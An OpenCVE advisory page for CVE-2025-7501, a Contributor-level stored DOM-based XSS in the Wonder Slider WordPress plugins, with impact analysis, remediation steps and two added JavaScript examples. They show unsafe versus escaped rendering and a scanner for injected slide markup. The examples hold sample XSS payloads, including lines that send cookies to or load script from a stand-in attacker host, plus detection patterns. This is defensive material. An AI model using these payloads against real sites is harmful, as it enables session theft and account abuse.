Description
The Wonder Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image title and description DOM in all versions up to, and including, 14.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-07-26
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-Site Scripting (XSS): an authenticated user with Contributor-level access or above can store script in slider image titles and descriptions that executes in the browser of anyone who views a page containing the affected slider.
Action: Patch
AI Analysis

Impact

The plugin neither sanitizes image titles and descriptions on input nor escapes them on output. Because the bug is DOM-based, the stored strings are written into the page by the slider's front-end JavaScript (typically through innerHTML or equivalent string-built markup), so any HTML in them is parsed and any embedded script runs in the viewer's browser. An authenticated user with Contributor or higher privileges can therefore store a payload that executes for every visitor of any page that embeds the affected slider, including administrators reviewing the site. Realistic outcomes are defacement, content injection, and actions performed with a victim's privileges (for example REST API calls made with the victim's nonce); direct theft of WordPress authentication cookies is less likely because WordPress sets them HttpOnly.

Affected Systems

The advisory title names both Wonder Slider Lite and Wonder Slider, from the vendor Wonderplugin; all releases up to and including 14.4 are affected. The flaw is in the front-end code that renders image titles and descriptions into the slider's DOM, so any WordPress site running either plugin at version 14.4 or earlier is exposed wherever a slider is embedded.

Risk and Exploitability

The CVSS 3.1 base score of 6.4 (vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) rates the flaw medium: network-reachable and low complexity, but requiring a low-privilege account; the changed scope reflects that script stored by one user executes in other users' browsers. The EPSS score below 1% and the absence of a CISA KEV listing indicate no observed exploitation at the time of writing. Contributor is the lowest WordPress role that can author content, so sites that hand out Contributor accounts (open registration, guest authors, agency clients) should treat this as reachable by a malicious or compromised low-privilege user, not only by an insider. The exploit path is simple: the attacker creates or edits a slider image and sets its title or description to an HTML/JavaScript payload; the value is stored as-is and rendered into the DOM, unescaped, for every visitor to the page.
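The following is an added example, not code from Wonder Slider or from OpenCVE, illustrating the rendering flaw described in the Impact and Risk sections above: a stored slide title concatenated straight into markup beside the same rendering with output escaping. The slide records, the payloads and the function names are constructed for this illustration; the plugin's actual data layout and render routine are not known here.

```javascript
// Added example (not the plugin's code): how an unescaped slide title or description
// becomes DOM-based stored XSS, beside the escaped rendering that prevents it.
// Record shape, payloads and function names are constructed for this illustration.

// Constructed sample of what a Contributor might save as slide metadata.
const STORED_SLIDES = [
  { src: "/wp-content/uploads/beach.jpg", title: "Summer beach", description: "Sunset on the pier" },
  { src: "/wp-content/uploads/x.jpg",
    title: '<img src=x onerror="alert(document.domain)">',
    description: 'Promo</p><script>fetch("/wp-json/wp/v2/users/me")</script><p>' },
];

// Vulnerable pattern: stored strings are concatenated straight into markup that the
// front-end script later assigns to innerHTML. Anything HTML-like is parsed as HTML.
function renderSlideUnsafe(slide) {
  return '<div class="slide"><img src="' + slide.src + '">' +
         '<h3>' + slide.title + '</h3><p>' + slide.description + '</p></div>';
}

// Escape the five characters that can break out of text or a double-quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]
  ));
}

// Hardened pattern: every stored field is escaped at the point it is written into markup.
// In a real browser, building nodes with createElement/textContent/setAttribute achieves
// the same without string concatenation; URL fields additionally need scheme validation.
function renderSlideSafe(slide) {
  return '<div class="slide"><img src="' + escapeHtml(slide.src) + '">' +
         '<h3>' + escapeHtml(slide.title) + '</h3><p>' + escapeHtml(slide.description) + '</p></div>';
}

// Check used by the tests: does the rendered markup still contain an active <script>
// element or an <img> carrying an onerror handler that came from stored data?
function containsActiveMarkup(html) {
  return /<script\b|<img\b[^>]*\bonerror=/i.test(html);
}

function renderAll(render) {
  return STORED_SLIDES.map(render).join("\n");
}
```

Run under Node: `renderAll(renderSlideUnsafe)` yields markup in which the second slide's title is a live `<img onerror>` and its description closes the paragraph and opens a `<script>` element, while `renderAll(renderSlideSafe)` renders both as visible text. Escaping must happen on output; sanitizing on input alone leaves any payload already in the database exploitable.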

Generated by OpenCVE AI on April 21, 2026 at 03:49 UTC.

Remediation

No vendor fix or workaround is recorded on this page. The advisory bounds the affected range at 14.4 inclusive, so consult the vendor changelog before concluding that newer releases remain affected.

OpenCVE Recommended Actions

  • Update Wonder Slider and Wonder Slider Lite to the latest available release (anything newer than 14.4, which the advisory gives as the upper bound of the affected range), and confirm the installed version afterwards.
  • If an update cannot be applied immediately, review who holds Contributor or higher roles, remove the role from accounts that do not need it, and, where the plugin allows it, restrict who can edit slider image titles and descriptions. Audit existing slides for injected markup as well: a payload stored before the patch stays in the database and may still render if the fix only sanitizes new input.
  • A Content-Security-Policy that disallows inline script would stop the injected script from running, but stock WordPress and most plugins depend on inline scripts, so test such a policy carefully or deploy it in report-only mode first. Treat it, and any WAF rule matching script tags or event-handler attributes in slider fields, as defense in depth rather than a substitute for the update.
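As an added example (not OpenCVE's or the plugin's code), the audit step above can be scripted against an export of slide metadata: flag any title or description that carries script-bearing markup, decoding HTML entities first so a payload stored already-encoded is not missed, and list the accounts that wrote it so the Contributor-access review has a starting point. The record shape, field names and sample rows are constructed; Wonder Slider's real storage format is not known here.

```javascript
// Added example (not OpenCVE's or the plugin's code): audit stored slider metadata for
// injected markup and report which accounts authored it. Record shape, field names and
// the sample rows below are constructed for this illustration.

const SLIDE_RECORDS = [
  { id: 1, author: "editor_jane", title: "Spring sale", description: "20% off all week" },
  { id: 2, author: "contrib_bob", title: "Team photo", description: "Click <b>here</b> for more" },
  { id: 3, author: "contrib_bob",
    title: 'News<svg/onload=fetch("//attacker.example/"+document.cookie)>',
    description: "Latest updates" },
  { id: 4, author: "contrib_eve", title: "Promo",
    description: "See &lt;script&gt;import('//attacker.example/x.js')&lt;/script&gt;" },
  { id: 5, author: "editor_jane", title: "Tom & Jerry", description: "Fun for 5 > 3 year olds" },
];

// Minimal single-pass entity decode, so a payload that the plugin's JS would decode at
// render time is inspected in its decoded form.
function decodeEntities(s) {
  return String(s)
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(Number(d)))
    .replace(/&lt;/gi, "<").replace(/&gt;/gi, ">").replace(/&quot;/gi, '"')
    .replace(/&#39;|&apos;/gi, "'").replace(/&amp;/gi, "&");
}

// Indicators of script-bearing content. This is a review heuristic, not a sanitizer:
// it flags rows for a human, it does not decide what is safe to render.
const INDICATORS = [
  { name: "script-tag",     re: /<\s*script\b/i },
  { name: "event-handler",  re: /<[^>]*\bon[a-z]+\s*=/i },
  { name: "javascript-url", re: /(?:href|src|action)\s*=\s*["']?\s*javascript:/i },
  { name: "dangerous-tag",  re: /<\s*(?:iframe|object|embed|svg|math|meta|base|link)\b/i },
];

// Names of every indicator that matches one field value, in INDICATORS order.
function scanField(value) {
  const decoded = decodeEntities(value);
  return INDICATORS.filter(({ re }) => re.test(decoded)).map(({ name }) => name);
}

// One finding per offending field: which slide, which field, which author, and why.
function findInjectedSlides(records) {
  const findings = [];
  for (const rec of records) {
    for (const field of ["title", "description"]) {
      const hits = scanField(rec[field] ?? "");
      if (hits.length) findings.push({ id: rec.id, field, author: rec.author, indicators: hits });
    }
  }
  return findings;
}

// Sorted, de-duplicated list of accounts that authored anything flagged.
function authorsToReview(records) {
  return [...new Set(findInjectedSlides(records).map((f) => f.author))].sort();
}
```

On the constructed rows, `findInjectedSlides(SLIDE_RECORDS)` flags slide 3 (an `<svg onload>` handler) and slide 4 (an entity-encoded `<script>`), while the benign `<b>` in slide 2 and the literal `&` and `>` in slide 5 are left alone; `authorsToReview` then names the two Contributor accounts. Pair this with the WordPress revision history or access logs to distinguish a compromised account from a malicious one before revoking roles.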

Advisories
Source: EUVD
ID: EUVD-2025-22787
Title: The Wonder Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image title and description DOM in all versions up to, and including, 14.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
History

Mon, 28 Jul 2025 16:15:00 +0000

Type: Metrics (ssvc)
Values added: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 28 Jul 2025 13:00:00 +0000

Type: First Time appeared
Values added: Wonderplugin; Wonderplugin wonder Slider Lite; Wordpress; Wordpress wordpress
Type: Vendors & Products
Values added: Wonderplugin; Wonderplugin wonder Slider Lite; Wordpress; Wordpress wordpress

Sat, 26 Jul 2025 07:00:00 +0000

Type: Description
Values added: The Wonder Slider Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image title and description DOM in all versions up to, and including, 14.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Type: Title
Values added: Wonder Slider Lite & Wonder Slider <= 14.4 - Authenticated (Contributor+) Dom-based Stored Cross-Site Scripting
Type: Weaknesses
Values added: CWE-79
Type: References
Type: Metrics (cvssV3_1)
Values added: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


Subscriptions

Wonderplugin Wonder Slider Lite
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:45:15.000Z

Reserved: 2025-07-11T18:04:54.573Z

Link: CVE-2025-7501

Vulnrichment

Updated: 2025-07-28T15:52:35.708Z

NVD

Status: Deferred

Published: 2025-07-26T07:15:26.093

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-7501

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-21T04:00:10Z

Weaknesses